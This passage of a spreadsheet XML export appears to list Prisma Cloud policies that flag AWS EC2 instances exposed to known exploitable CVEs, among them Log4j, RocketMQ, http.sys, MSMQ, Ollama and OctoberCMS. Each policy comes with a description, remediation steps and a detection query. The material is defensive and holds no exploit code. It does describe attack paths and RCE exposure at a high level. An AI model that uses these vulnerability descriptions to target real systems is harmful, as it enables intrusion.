          <t>attack_path</t>
        </is>
      </c>
      <c r="P1711" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1711" t="inlineStr"/>
      <c r="R1711" t="inlineStr"/>
      <c r="S1711" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1711" t="b">
        <v>0</v>
      </c>
      <c r="U1711" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1711" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1711" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Command execution vulnerability (CVE-2023-33246).
Command execution vulnerability would allow an attacker to execute arbitrary commands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RocketMQ Command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RocketMQ (CVE-2023-33246) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X171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CVE-2023-33246
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-33246</t>
        </is>
      </c>
      <c r="Y1711" t="inlineStr"/>
      <c r="Z1711" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-33246'))</t>
        </is>
      </c>
      <c r="AA1711" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1711" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:16</t>
        </is>
      </c>
      <c r="AC1711" t="inlineStr"/>
      <c r="AD1711" t="b">
        <v>1</v>
      </c>
      <c r="AE1711" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1711" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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1" t="inlineStr">
        <is>
          <t>412c0227-de57-41f8-9053-641c8ee40df3</t>
        </is>
      </c>
      <c r="AI1711" t="inlineStr">
        <is>
          <t>645065b1-15b6-4a1d-a703-8080218b6e0b</t>
        </is>
      </c>
      <c r="AJ1711" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1711" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1712">
      <c r="A1712" t="inlineStr"/>
      <c r="B1712" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1712" s="2" t="inlineStr"/>
      <c r="D1712" t="inlineStr"/>
      <c r="E1712" t="inlineStr"/>
      <c r="F1712" t="inlineStr"/>
      <c r="G1712" t="b">
        <v>1</v>
      </c>
      <c r="H17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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1712" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1712" t="inlineStr">
        <is>
          <t>Potentially unauthorized malware activity detected via traffic to suspicious domains on a publicly exposed and vulnerable AWS EC2 instance</t>
        </is>
      </c>
      <c r="L1712" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,COMMAND_AND_CONTROL,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1712" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1712" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1712" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1712" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1712" t="inlineStr"/>
      <c r="R1712" t="inlineStr"/>
      <c r="S1712" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1712" t="b">
        <v>0</v>
      </c>
      <c r="U1712" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1712" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1712" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed, have critical or high vulnerabilities and are connected to remote systems known for suspicious domain request activities.
Attackers can exploit the vulnerabilities on the EC2 instances to compromise their confidentiality, integrity, and availability, allowing them to perform malicious actions. If there is network connectivity with remote systems known for domain generation algorithms (DGAs) or cryptomining domain request activity on a publicly exposed and exploitable EC2 instance, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to investigate suspicious domain request activities, remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X171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12" t="inlineStr"/>
      <c r="Z1712" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)') and ('DGA domain request activity' or 'Cryptomining domain request activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1712" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1712" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC1712" t="inlineStr"/>
      <c r="AD1712" t="b">
        <v>1</v>
      </c>
      <c r="AE1712" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1712" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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2" t="inlineStr">
        <is>
          <t>28bf3c47-0271-4b44-9233-fec1cccbf7ee</t>
        </is>
      </c>
      <c r="AI1712" t="inlineStr">
        <is>
          <t>1f6d9adb-d94b-4012-bc76-32592d27a239</t>
        </is>
      </c>
      <c r="AJ1712" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1712" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1713">
      <c r="A1713" t="inlineStr"/>
      <c r="B1713" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1713" s="2" t="inlineStr"/>
      <c r="D1713" t="inlineStr"/>
      <c r="E1713" t="inlineStr"/>
      <c r="F1713" t="inlineStr"/>
      <c r="G1713" t="b">
        <v>1</v>
      </c>
      <c r="H17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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1713" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1713" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [Double Free in http.sys, CVE-2022-21907]</t>
        </is>
      </c>
      <c r="L1713" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1713" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1713" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1713" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1713" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1713" t="inlineStr"/>
      <c r="R1713" t="inlineStr"/>
      <c r="S1713" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1713" t="b">
        <v>0</v>
      </c>
      <c r="U1713" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1713" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1713" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to Remote Code Execution (RCE) with exploits in the wild[Double Free in http.sys, CVE-2022-21907].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version with http.sys installed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the Double Free in http.sys RCE [CVE-2022-21907] vulnerability reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X171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CVE-2022-21907
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-21907</t>
        </is>
      </c>
      <c r="Y1713" t="inlineStr"/>
      <c r="Z1713" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-21907 - Double Free in http.sys Remote Code Execution) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-21907'))</t>
        </is>
      </c>
      <c r="AA1713" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1713" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:34</t>
        </is>
      </c>
      <c r="AC1713" t="inlineStr"/>
      <c r="AD1713" t="b">
        <v>1</v>
      </c>
      <c r="AE1713" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1713" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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3" t="inlineStr">
        <is>
          <t>f06462c0-0b2e-462c-bcec-35a81459f089</t>
        </is>
      </c>
      <c r="AI1713" t="inlineStr">
        <is>
          <t>86459e67-d319-46d1-9015-e478b90d21bb</t>
        </is>
      </c>
      <c r="AJ1713" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1713" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1714">
      <c r="A1714" t="inlineStr"/>
      <c r="B1714" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1714" s="2" t="inlineStr"/>
      <c r="D1714" t="inlineStr"/>
      <c r="E1714" t="inlineStr"/>
      <c r="F1714" t="inlineStr"/>
      <c r="G1714" t="b">
        <v>1</v>
      </c>
      <c r="H17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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1714" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1714" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance (Microsoft Message Queuing (MSMQ), CVE-2023-21554)</t>
        </is>
      </c>
      <c r="L1714" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1714" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1714" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1714" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1714" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1714" t="inlineStr"/>
      <c r="R1714" t="inlineStr"/>
      <c r="S1714" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1714" t="b">
        <v>0</v>
      </c>
      <c r="U1714" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1714" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1714" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-21554).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Microsoft Message Queuing (MSMQ)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Microsoft Message Queuing (MSMQ) (CVE-2023-21554) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X171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CVE-2023-21554
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-21554</t>
        </is>
      </c>
      <c r="Y1714" t="inlineStr"/>
      <c r="Z1714" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-21554'))</t>
        </is>
      </c>
      <c r="AA1714" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1714" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:15</t>
        </is>
      </c>
      <c r="AC1714" t="inlineStr"/>
      <c r="AD1714" t="b">
        <v>1</v>
      </c>
      <c r="AE1714" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1714" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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4" t="inlineStr">
        <is>
          <t>f239f702-0b64-4081-8cb4-1281be98ebb2</t>
        </is>
      </c>
      <c r="AI1714" t="inlineStr">
        <is>
          <t>0fcf9b0d-f274-4b97-bee2-b8a82afdb31e</t>
        </is>
      </c>
      <c r="AJ1714" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1714" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1715">
      <c r="A1715" t="inlineStr"/>
      <c r="B1715" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1715" s="2" t="inlineStr"/>
      <c r="D1715" t="inlineStr"/>
      <c r="E1715" t="inlineStr"/>
      <c r="F1715" t="inlineStr"/>
      <c r="G1715" t="b">
        <v>1</v>
      </c>
      <c r="H17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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1715" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1715" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [Log4j, CVE-2021-44228]</t>
        </is>
      </c>
      <c r="L1715" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1715" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1715" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1715" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1715" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1715" t="inlineStr"/>
      <c r="R1715" t="inlineStr"/>
      <c r="S1715" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1715" t="b">
        <v>0</v>
      </c>
      <c r="U1715" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1715" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1715" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to remote code execution (RCE) with exploits in the wild [Log4j, CVE-2021-44228]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of Log4j software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Log4j [CVE-2021-44228] vulnerability reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X171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t>
        </is>
      </c>
      <c r="Y1715" t="inlineStr"/>
      <c r="Z1715" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-44228 - Apache Log4j2 &lt; 2.15.0) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-44228'))</t>
        </is>
      </c>
      <c r="AA1715" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1715" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:31</t>
        </is>
      </c>
      <c r="AC1715" t="inlineStr"/>
      <c r="AD1715" t="b">
        <v>1</v>
      </c>
      <c r="AE1715" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1715" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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5" t="inlineStr">
        <is>
          <t>79c498c3-d138-4d0d-a1c3-a0c3315c6070</t>
        </is>
      </c>
      <c r="AI1715" t="inlineStr">
        <is>
          <t>cafbb698-d70d-4916-a5cb-84d4c297b930</t>
        </is>
      </c>
      <c r="AJ1715" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1715" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1716">
      <c r="A1716" t="inlineStr"/>
      <c r="B1716" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1716" s="2" t="inlineStr"/>
      <c r="D1716" t="inlineStr"/>
      <c r="E1716" t="inlineStr"/>
      <c r="F1716" t="inlineStr"/>
      <c r="G1716" t="b">
        <v>1</v>
      </c>
      <c r="H17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16" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1716" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1716" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) risk due to publicly exposed AWS EC2 instance with Probllama vulnerability (Ollama, CVE-2024-37032)</t>
        </is>
      </c>
      <c r="L1716" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1716" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1716" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1716" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1716" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1716" t="inlineStr"/>
      <c r="R1716" t="inlineStr"/>
      <c r="S1716" t="inlineStr">
        <is>
          <t>Prisma_Cloud,Disabled for XYZ Reason</t>
        </is>
      </c>
      <c r="T1716" t="b">
        <v>0</v>
      </c>
      <c r="U1716" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1716" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1716" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have a known exploitable Remote Code Execution vulnerability named Probllama (CVE-2024-37032).
Ollama is a service for packaging, deploying, and running large language models (LLMs) locally on Windows, Linux, and macOS devices. CVE-2024-37032 exploits a path traversal flaw in Ollama's file upload functionality, enabling an attacker to upload a malicious file, traverse directories, and execute arbitrary code. The fact that the AWS EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Ollama (CVE-2024-37032) vulnerability and public exposure reported for the AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X1716" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict Internet exposure of reported EC2 instances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[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2024-37032
2. Perform thorough backups of software configurations and data before applying updates
3. Refer to given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2024-37032</t>
        </is>
      </c>
      <c r="Y1716" t="inlineStr"/>
      <c r="Z1716" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-37032'))</t>
        </is>
      </c>
      <c r="AA1716" t="inlineStr">
        <is>
          <t>Pramod Dhamenia</t>
        </is>
      </c>
      <c r="AB1716" t="inlineStr">
        <is>
          <t>2024-11-06 21:49:31</t>
        </is>
      </c>
      <c r="AC1716" t="inlineStr"/>
      <c r="AD1716" t="b">
        <v>1</v>
      </c>
      <c r="AE1716" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1716" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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16" t="inlineStr">
        <is>
          <t>ffe8214e-1419-4888-8994-0e0f61b05bd9</t>
        </is>
      </c>
      <c r="AI1716" t="inlineStr">
        <is>
          <t>4bb360ae-3d3c-4d74-9d7f-b79a296a65f5</t>
        </is>
      </c>
      <c r="AJ1716" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1716" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1717">
      <c r="A1717" t="inlineStr"/>
      <c r="B1717" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1717" s="2" t="inlineStr"/>
      <c r="D1717" t="n">
        <v>11</v>
      </c>
      <c r="E1717" t="n">
        <v>0</v>
      </c>
      <c r="F1717" t="n">
        <v>0</v>
      </c>
      <c r="G1717" t="b">
        <v>1</v>
      </c>
      <c r="H17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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1717" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1717" t="inlineStr">
        <is>
          <t>CRLF Injection risk due to publicly exposed and vulnerable AWS EC2 instance [Python, CVE-2020-26137]</t>
        </is>
      </c>
      <c r="L1717" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1717" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1717" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1717" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1717" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1717" t="inlineStr"/>
      <c r="R1717" t="inlineStr"/>
      <c r="S1717" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1717" t="b">
        <v>0</v>
      </c>
      <c r="U1717" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1717" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1717" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable CRLF injection vulnerability [Python, CVE-2020-26137].
CRLF injection vulnerability is a security flaw allowing an attacker to inject a CRLF sequence. The fact that the AWS EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Python [CVE-2020-26137] vulnerability and public exposure reported for the AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X171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1717" t="inlineStr"/>
      <c r="Z1717" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2020-26137'))</t>
        </is>
      </c>
      <c r="AA1717" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1717" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:57</t>
        </is>
      </c>
      <c r="AC1717" t="inlineStr"/>
      <c r="AD1717" t="b">
        <v>1</v>
      </c>
      <c r="AE1717" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1717" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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7" t="inlineStr">
        <is>
          <t>b4adee34-15ee-4435-b36a-305c5dc41d03</t>
        </is>
      </c>
      <c r="AI1717" t="inlineStr">
        <is>
          <t>b2f85420-5391-46f4-b385-bacc9d4a1a2b</t>
        </is>
      </c>
      <c r="AJ1717" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1717" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1718">
      <c r="A1718" t="inlineStr"/>
      <c r="B1718" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1718" s="2" t="inlineStr"/>
      <c r="D1718" t="inlineStr"/>
      <c r="E1718" t="inlineStr"/>
      <c r="F1718" t="inlineStr"/>
      <c r="G1718" t="b">
        <v>1</v>
      </c>
      <c r="H17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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1718" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1718" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [OctoberCMS, CVE-2021-32648]</t>
        </is>
      </c>
      <c r="L1718" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1718" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1718" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1718" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1718" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1718" t="inlineStr"/>
      <c r="R1718" t="inlineStr"/>
      <c r="S1718" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1718" t="b">
        <v>0</v>
      </c>
      <c r="U1718" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1718" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1718" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to remote code execution (RCE) with exploits in the wild [OctoberCMS, CVE-2021-32648]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of OctoberCMS software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the OctoberCMS [CVE-2021-32648] vulnerability reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X171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CVE-2021-32648
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-32648</t>
        </is>
      </c>
      <c r="Y1718" t="inlineStr"/>
      <c r="Z1718" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-32648 - OctocberCMS) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-32648'))</t>
        </is>
      </c>
      <c r="AA1718" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1718" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:35</t>
        </is>
      </c>
      <c r="AC1718" t="inlineStr"/>
      <c r="AD1718" t="b">
        <v>1</v>
      </c>
      <c r="AE1718" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1718" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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8" t="inlineStr">
        <is>
          <t>ba69bea8-54c8-4f76-a613-11f73447696f</t>
        </is>
      </c>
      <c r="AI1718" t="inlineStr">
        <is>
          <t>b45d811a-4b26-4a19-ae97-22fd305877b4</t>
        </is>
      </c>
      <c r="AJ1718" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1718" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1719">
      <c r="A1719" t="inlineStr"/>
      <c r="B1719" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1719" s="2" t="inlineStr"/>
      <c r="D1719" t="inlineStr"/>
      <c r="E1719" t="inlineStr"/>
      <c r="F1719" t="inlineStr"/>
      <c r="G1719" t="b">
        <v>1</v>
      </c>
      <c r="H17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19" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1719" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1719" t="inlineStr">
        <is>
          <t>Privilege escalation and lateral movement risk due to a publicly exposed and vulnerable AWS EC2 instance with sensitive EC2 Instance Connect related IAM permissions</t>
        </is>
      </c>
      <c r="L1719" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1719" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1719" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1719" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1719" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1719" t="inlineStr"/>
      <c r="R1719" t="inlineStr"/>
      <c r="S1719" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1719" t="b">
        <v>0</v>
      </c>
      <c r="U1719" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1719" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1719" t="inlineStr">
